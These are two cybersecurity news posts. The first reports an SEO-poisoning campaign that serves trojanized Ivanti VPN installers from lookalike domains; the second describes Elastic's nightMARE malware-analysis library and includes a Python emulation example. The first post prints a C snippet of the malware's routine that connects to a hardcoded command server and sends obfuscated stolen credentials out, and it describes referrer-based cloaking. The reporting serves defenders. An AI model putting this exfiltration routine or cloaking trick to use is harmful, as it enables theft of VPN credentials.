An aggressive SEO poisoning campaign has surfaced in early October 2025, preying on users searching for the legitimate Ivanti Pulse Secure VPN client.

Attackers have registered lookalike domains such as ivanti-pulsesecure.com and ivanti-secure-access.org to host trojanized installers that appear official.

Unsuspecting victims clicking on top search results are redirected to these malicious sites, where a signed MSI file is offered for download under the guise of Ivanti’s Secure Access Client.

The trojanized installer carries a credential-stealing DLL, designed to harvest saved VPN connection details and exfiltrate them to a C2 server hosted on Microsoft Azure infrastructure.

Zscaler researchers noted a sophisticated referrer-based content delivery tactic used by the phishing domains. When accessed directly in a browser, the sites display benign content without any download links, evading quick detection by analysts and security scanners.

Only users arriving via search engine referrals—particularly from Bing—are shown the malicious download button, exploiting the HTTP Referrer header to cloak the true intent of the pages.

Once downloaded, the MSI installer drops two malicious DLLs—dwmapi.dll and pulseextension.dll—signed by a legitimate certificate authority to further bypass security controls.

These DLLs embed a sequence of routines to locate and parse the Ivanti connection store (connectionstore.dat), extracting saved URIs and credentials.

Delving into the infection mechanism reveals how the malware establishes persistence and stealth. Upon execution, the trojanized DLL initiates a network handshake with a hardcoded IP address in the Azure range (4.239.95.1) on port 8080.

The following C code snippet illustrates the socket setup and data exchange routine:-

WSADATA was;
WSAStartup(MAKEWORD(2,2), &wsa);
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in addr = {0};
addr.sin_family = AF_INET;
addr.sin_port   = htons(8080);
inet_pton(AF_INET, "4.239.95.1", &addr.sin_addr);
connect(sock, (struct sockaddr*)&addr, sizeof(addr));
// Receive 48 bytes
recv(sock, buf, 0x30, 0);
// XOR deobfuscation
for(int i=0;i<0x30;i++) buf[i]^=key[i];
// Send 52-byte obfuscated payload
send(sock, buf, 0x34, 0);

After the initial handshake and XOR-based deobfuscation routine, the malware transmits stolen VPN credentials in an HTTP POST request to the path /incomeshit, a colloquial label for exfiltration channels.

Because the IP resides within Microsoft Azure’s range, security teams may overlook these connections as benign cloud traffic.

By masquerading as trusted software and incorporating advanced evasion techniques, this campaign demonstrates the potency of search engine poisoning as an initial access vector.

Organizations should validate any Ivanti installer checksums, monitor outbound connections to unfamiliar Azure IPs on port 8080, and educate users on verifying official download sources.

Continuous threat hunting for referrer-based anomalies remains essential to thwarting these stealthy attacks.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Beware of Malicious Ivanti VPN Client Sites in Google Search That Delivers Malware appeared first on Cyber Security News.

Since its public debut in October 2025, nightmare has quickly become a vital tool for malware analysts seeking to streamline static and dynamic analysis workflows.

Developed by Elastic Security Labs, nightmare brings together mature open-source reverse engineering components under a unified Python API.

Rather than forcing users to juggle disparate dependencies, nightmare leverages Rizin via rz-pipe for disassembly and the Unicorn engine for lightweight emulation.

This cohesive design empowers researchers to rapidly craft configuration extractors, carve IoCs, and automate recurring analysis tasks.

Emerging from a need to reduce code duplication across Elastic’s internal tooling, nightmare builds on practices honed over thousands of sample analyses.

Elastic analysts noted that many proprietary scripts suffered from fragile dependency chains and inconsistent abstractions.

By encapsulating common patterns—such as pattern matching, instruction emulation, and cross-reference enumeration—within a robust library, nightMARE provides a stable foundation for both seasoned and novice reverse engineers.

Upon installation, nightmare exposes three main modules: analysis, core, and malware. The analysis module integrates Rizin to enable disassembly, hex-pattern searches, and function enumeration.

The core module offers utilities for bitwise operations, regex-based extraction, and data casting.

Finally, the malware module groups family-specific extractors—ranging from Smokeloader to LUMMA—into versioned sub-packages that demonstrate real-world uses of the API.

Elastic researchers identified a significant spike in LUMMA stealer campaigns in mid-2025, underscoring the value of rapid configuration extraction.

Through nightmare’s emulation capabilities, analysts can instantiate a WindowsEmulator, register Import Address Table (IAT) hooks on APIs such as Sleep, and execute targeted code sequences in seconds.

By intercepting decryption routines in-process, nightMARE automates the recovery of C2 domains without manual unpacking or debugger-driven tracing.

Infection Mechanism and Emulation-Driven Extraction

nightMARE’s emulation framework offers a lightweight alternative to full-scale sandboxing. Consider the common technique where malware invokes Sleep before proceeding to C2 decryption.

The following code snippet demonstrates how nightMARE’s WindowsEmulator hooks Sleep in a LUMMA sample, capturing timing behavior and enabling uninterrupted emulation:-

import pathlib
from nightMARE.analysis import emulation

def sleephook(emu: emulation.WindowsEmulator, args):
    print(f"Sleep {emu.unicorn.reg_read(emulation.unicorn.x86_const.UC_X86_REG_ECX)} ms")
    emu.do_return()

def main():
    path = pathlib.Path(r"C:\samples\DismHost.exe")
    emu = emulation.WindowsEmulator(is_32bits=False)
    emu.load_pe(path.read_bytes(), stack_size=0x10000)
    emu.enable_iat_hooking()
    emu.set_iat_hook(b"KERNEL32.dll!Sleep", sleephook)
    emu.unicorn.emu_start(0x140006404, 0x140006412)

By intercepting the Sleep call, the emulator advances past timing obfuscation and resumes execution at the next instruction.

Combined with emu.get_data() and emu.get_xrefs_from(), analysts reconstruct decryption key and nonce addresses, allocate memory buffers, and invoke the malware’s ChaCha20 routine directly.

Ultimately, nightMARE outputs a decrypted list of C2 domains, ready for threat intelligence ingestion.

With version 0.16, Elastic Security Labs continues to expand nightMARE’s repertoire, adding emulation support for additional API hooks, enhancing pattern-matching accuracy, and refining malware module templates.

As emerging threats exploit novel obfuscation and packing schemes, nightMARE stands poised to accelerate analysis pipelines and empower the community’s collective defense.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post New nightMARE Python Library to Analyze Malware and Extract Intelligence Indicators appeared first on Cyber Security News.